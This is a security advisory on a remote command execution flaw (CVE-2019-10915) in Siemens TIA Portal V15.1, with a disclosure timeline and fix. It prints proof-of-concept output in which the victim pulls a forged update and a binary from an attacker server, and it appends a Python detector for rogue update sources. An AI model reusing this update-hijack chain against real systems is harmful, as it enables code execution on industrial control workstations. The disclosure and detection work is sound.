### Synopsis

Tenable discovered a vulnerability in Siemens TIA Portal V15.1. The vulnerability is an unauthenticated, remote command execution vulnerability that gives a remote, unauthenticated attacker administrative access to all application commands. An attacker can invoke application functionality by sending crafted packets over the WebSockets protocol. The following output is from a proof of concept that triggers a malicious firmware update from an arbitrary server:

```
$python siemens_rce.py
Starting httpd...
10.0.0.134 - - [08/Jul/2019 10:47:31] "GET /PWRSim/ HTTP/1.1" 200 -
10.0.0.134 - - [08/Jul/2019 10:47:33] "GET /PWRSim/PWRControlNet10 HTTP/1.1" 200 -
10.0.0.134 - - [08/Jul/2019 10:47:39] "GET /PWRSim/PWRControlNet10/SWM_RollOut_Configuration.xml HTTP/1.1" 200 -
10.0.0.134 - - [08/Jul/2019 10:47:43] "GET /PWRSim/PWRControlNet10/UpdatesSummaryCatalog.xml HTTP/1.1" 200 -
[+] Writing xml update forwarder -> Inventory_TIAPORTAL_V15_UPD99.xml
10.0.0.134 - - [08/Jul/2019 10:47:47] "GET /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4//Inventory_TIAPORTAL_V15_UPD99.xml HTTP/1.1" 200 -
[+] Writing binary update forwarder -> Inventory_TIAPORTAL_V15_UPD99.exe
10.0.0.134 - - [08/Jul/2019 10:47:54] "HEAD /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.exe HTTP/1.1" 200 -
10.0.0.134 - - [08/Jul/2019 10:47:54] "HEAD /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.txt HTTP/1.1" 200 -
10.0.0.134 - - [08/Jul/2019 10:48:01] "GET /PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.exe HTTP/1.1" 200 -
[?] Checking BITS Range -> Got BITS range 0-4894
[+] Reading "calc.exe", sending segment [seeking->0, reading->4894]
```

### Solution

Upgrade to TIA Portal V15 Update 5

### Disclosure Timeline

* 04/01/2019 - Tenable discloses to Siemens. The 90-day deadline is July 1.
* 04/02/2019 - Siemens acknowledges Tenable's report, provides their disclosure policy, and asks for Tenable's public key.
* 04/02/2019 - Tenable provides their public key.
* 04/05/2019 - Siemens acknowledges the vulnerability and is working on a fix.
* 04/08/2019 - Tenable requests a CVE from Siemens.
* 04/09/2019 - Siemens says they will assign a CVE shortly before publication.
* 05/02/2019 - Siemens assigns CVE-2019-10915.
* 05/28/2019 - Siemens says they will publish an advisory on June 11th.
* 06/06/2019 - Siemens requests that Tenable delay publishing until July 9.
* 06/11/2019 - Tenable agrees to delay the advisory until July 9.
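The proof-of-concept output above shows the TIA Portal host fetching update metadata (`UpdatesSummaryCatalog.xml`, the `Inventory_..._UPD99.xml` forwarder) and then an update binary from the attacker's web server. A defender can spot that pattern on the egress side by watching which hosts a TIA Portal workstation pulls update artefacts from. The following detection is an added example written for this advisory, not Tenable's or Siemens' code; the proxy-style log lines, the `10.0.0.5` server and the `TRUSTED_UPDATE_HOSTS` value are constructed placeholders.

```python
import re

# Constructed proxy-style access log (not from the advisory). Format per line:
# client - - [timestamp] "METHOD http://server/path HTTP/x.y" status
SAMPLE_PROXY_LOG = """\
10.0.0.134 - - [08/Jul/2019 10:47:31] "GET http://10.0.0.5/PWRSim/ HTTP/1.1" 200
10.0.0.134 - - [08/Jul/2019 10:47:43] "GET http://10.0.0.5/PWRSim/PWRControlNet10/UpdatesSummaryCatalog.xml HTTP/1.1" 200
10.0.0.134 - - [08/Jul/2019 10:47:47] "GET http://10.0.0.5/PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.xml HTTP/1.1" 200
10.0.0.134 - - [08/Jul/2019 10:48:01] "GET http://10.0.0.5/PWRSim/simatic/tiaportal/SEBU-TIAPORTALUPDATE/15.1.0.4/Inventory_TIAPORTAL_V15_UPD99.exe HTTP/1.1" 200
10.0.0.140 - - [08/Jul/2019 11:02:10] "GET http://updates.example-vendor.test/simatic/tiaportal/UpdatesSummaryCatalog.xml HTTP/1.1" 200
"""

# Placeholder allowlist; replace with the update server(s) your site actually uses.
TRUSTED_UPDATE_HOSTS = {"updates.example-vendor.test"}

# Path fragments that appear in the TIA Portal update flow shown in the advisory output.
UPDATE_FEED_MARKERS = ("UpdatesSummaryCatalog.xml", "SWM_RollOut_Configuration.xml", "/simatic/tiaportal/")

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<scheme>https?)://(?P<host>[^/\s]+)(?P<path>\S*) HTTP/[\d.]+" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one proxy log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_rogue_update_sources(log_text, trusted_hosts=TRUSTED_UPDATE_HOSTS):
    """Return one finding per (client, host) pair that pulled TIA Portal update
    metadata or an update binary from a host outside the trusted set. A finding
    with both catalog and binary set mirrors the full sequence in the PoC output."""
    findings = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if not any(marker in path for marker in UPDATE_FEED_MARKERS):
            continue  # not part of the update flow
        if rec["host"] in trusted_hosts:
            continue  # expected update server
        key = (rec["client"], rec["host"])
        f = findings.setdefault(key, {"client": rec["client"], "host": rec["host"],
                                      "first_seen": rec["ts"], "catalog": False, "binary": False})
        if path.lower().endswith(".exe"):
            f["binary"] = True   # update payload fetched from an untrusted host
        else:
            f["catalog"] = True  # update catalog/inventory fetched from an untrusted host
    for f in findings.values():
        f["severity"] = "high" if f["catalog"] and f["binary"] else "medium"
    return list(findings.values())
```

Pair this with an egress rule that only permits TIA Portal workstations to reach the allowlisted update hosts, so a rogue catalog fetch is blocked rather than merely logged.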